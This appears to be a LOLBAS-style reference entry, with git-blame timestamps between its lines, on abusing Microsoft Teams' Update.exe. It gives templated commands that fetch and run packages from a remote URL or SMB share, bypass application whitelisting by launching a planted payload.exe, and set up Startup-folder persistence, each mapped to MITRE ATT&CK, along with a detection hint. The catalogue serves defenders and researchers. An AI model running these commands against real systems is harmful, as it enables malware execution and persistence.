2019-06-27 14:26:24 +02:00
---
Name : Update.exe
2019-06-27 17:12:23 +02:00
Description : Binary to update the existing installed Nuget/squirrel package. Part of Microsoft Teams installation.
2019-06-27 17:01:34 +02:00
Author : 'Oddvar Moe'
2021-01-10 16:04:52 +01:00
Created : 2019-06-26
2019-06-27 14:26:24 +02:00
Commands :
- Command : Update.exe --download [url to package]
2019-06-27 17:12:23 +02:00
Description : The above binary will go to url and look for RELEASES file and download the nuget package.
2019-06-28 09:05:27 +02:00
Usecase : Download binary
Category : Download
2019-06-27 17:01:34 +02:00
Privileges : User
2021-01-10 16:04:52 +01:00
MitreID : T1218
2019-06-27 14:26:24 +02:00
MitreLink : https://attack.mitre.org/techniques/T1218/
2019-06-27 17:01:34 +02:00
OperatingSystem : Windows 7 and up with Microsoft Teams installed
2020-08-10 05:31:48 +02:00
- Command : Update.exe --update=[url to package]
2019-06-28 09:05:27 +02:00
Description : The above binary will go to url and look for RELEASES file, download and install the nuget package.
2019-06-27 14:26:24 +02:00
Usecase : Download and execute binary
Category : AWL Bypass
2019-06-27 17:01:34 +02:00
Privileges : User
2019-06-27 14:26:24 +02:00
MitreID : T1218
MitreLink : https://attack.mitre.org/techniques/T1218/
2019-06-27 17:01:34 +02:00
OperatingSystem : Windows 7 and up with Microsoft Teams installed
2020-08-10 05:31:48 +02:00
- Command : Update.exe --update=[url to package]
2019-06-28 09:05:27 +02:00
Description : The above binary will go to url and look for RELEASES file, download and install the nuget package.
2019-06-27 14:26:24 +02:00
Usecase : Download and execute binary
2019-06-28 09:05:27 +02:00
Category : Execute
2019-06-27 17:01:34 +02:00
Privileges : User
2019-06-27 14:26:24 +02:00
MitreID : T1218
MitreLink : https://attack.mitre.org/techniques/T1218/
2019-06-27 17:01:34 +02:00
OperatingSystem : Windows 7 and up with Microsoft Teams installed
2020-08-10 05:31:48 +02:00
- Command : Update.exe --update=\\remoteserver\payloadFolder
Description : The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
Usecase : Download and execute binary
Category : AWL Bypass
Privileges : User
MitreID : T1218
MitreLink : https://attack.mitre.org/techniques/T1218/
OperatingSystem : Windows 7 and up with Microsoft Teams installed
- Command : Update.exe --update=\\remoteserver\payloadFolder
Description : The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
Usecase : Download and execute binary
Category : Execute
Privileges : User
MitreID : T1218
MitreLink : https://attack.mitre.org/techniques/T1218/
OperatingSystem : Windows 7 and up with Microsoft Teams installed
- Command : Update.exe --updateRollback=[url to package]
2019-07-02 09:06:19 +02:00
Description : The above binary will go to url and look for RELEASES file, download and install the nuget package.
Usecase : Download and execute binary
Category : AWL Bypass
Privileges : User
MitreID : T1218
MitreLink : https://attack.mitre.org/techniques/T1218/
OperatingSystem : Windows 7 and up with Microsoft Teams installed
- Command : Update.exe --updateRollback=[url to package]
Description : The above binary will go to url and look for RELEASES file, download and install the nuget package.
Usecase : Download and execute binary
Category : Execute
Privileges : User
MitreID : T1218
MitreLink : https://attack.mitre.org/techniques/T1218/
OperatingSystem : Windows 7 and up with Microsoft Teams installed
2019-06-27 17:01:34 +02:00
- Command : Update.exe --processStart payload.exe --process-start-args "whatever args"
Description : Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied.
Usecase : Application Whitelisting Bypass
Category : AWL Bypass
Privileges : User
MitreID : T1218
MitreLink : https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem : Windows 7 and up with Microsoft Teams installed
2020-08-10 05:31:48 +02:00
- Command : Update.exe --updateRollback=\\remoteserver\payloadFolder
Description : The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
Usecase : Download and execute binary
Category : AWL Bypass
Privileges : User
MitreID : T1218
MitreLink : https://attack.mitre.org/techniques/T1218/
OperatingSystem : Windows 7 and up with Microsoft Teams installed
- Command : Update.exe --updateRollback=\\remoteserver\payloadFolder
Description : The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
Usecase : Download and execute binary
Category : Execute
Privileges : User
MitreID : T1218
MitreLink : https://attack.mitre.org/techniques/T1218/
OperatingSystem : Windows 7 and up with Microsoft Teams installed
2019-06-27 17:01:34 +02:00
- Command : Update.exe --processStart payload.exe --process-start-args "whatever args"
Description : Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied.
Usecase : Execute binary
Category : Execute
Privileges : User
MitreID : T1218
MitreLink : https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem : Windows 7 and up with Microsoft Teams installed
2020-10-29 09:12:28 +01:00
- Command : Update.exe --createShortcut=payload.exe -l=Startup
Description : Copy your payload into "%localappdata%\Microsoft\Teams\current\". Then run the command. Update.exe will create a payload.exe shortcut in "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup". Then payload will run on every login of the user who runs it.
Usecase : Execute binary
Category : Execute
Privileges : User
MitreID : T1547
MitreLink : https://attack.mitre.org/techniques/T1547/001/
OperatingSystem : Windows 7 and up with Microsoft Teams installed
- Command : Update.exe --removeShortcut=payload.exe -l=Startup
Description : Run the command to remove the shortcut created in the "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" directory you created with the LolBinExecution "--createShortcut" described on this page.
Usecase : Execute binary
Category : Execute
Privileges : User
MitreID : T1070
MitreLink : https://attack.mitre.org/techniques/T1070/
OperatingSystem : Windows 7 and up with Microsoft Teams installed
2019-06-27 14:26:24 +02:00
Full_Path :
2019-06-27 17:01:34 +02:00
- Path : '%localappdata%\Microsoft\Teams\update.exe'
2021-01-10 16:04:52 +01:00
Code_Sample :
2019-06-27 17:01:34 +02:00
- Code : https://github.com/jreegun/POC-s/tree/master/nuget-squirrel
2021-01-10 16:04:52 +01:00
Detection :
2019-06-27 17:01:34 +02:00
- IOC : Update.exe spawned an unknown process
2019-06-27 14:26:24 +02:00
Resources :
2019-06-27 17:01:34 +02:00
- Link : https://www.youtube.com/watch?v=rOP3hnkj7ls
- Link : https://twitter.com/reegun21/status/1144182772623269889
- Link : https://twitter.com/MrUn1k0d3r/status/1143928885211537408
2020-08-10 05:31:48 +02:00
- Link : https://twitter.com/reegun21/status/1291005287034281990
2019-06-27 17:01:34 +02:00
- Link : http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/
2019-06-28 08:48:41 +02:00
- Link : https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12
2019-07-02 09:06:19 +02:00
- Link : https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56
2020-08-10 05:31:48 +02:00
- Link : https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/microsoft-teams-updater-living-off-the-land/
2019-06-27 17:01:34 +02:00
Acknowledgement :
2020-08-10 05:31:48 +02:00
- Person : Reegun Richard Jayapaul (SpiderLabs, Trustwave)
2019-06-27 17:01:34 +02:00
Handle : '@reegun21'
2019-06-27 14:26:24 +02:00
- Person : Mr.Un1k0d3r
2019-06-27 17:01:34 +02:00
Handle : '@MrUn1k0d3r'
- Person : Adam
Handle : '@Hexacorn'
2020-10-29 09:12:28 +01:00
- Person : Jesus Galvez
2019-06-27 14:26:24 +02:00
---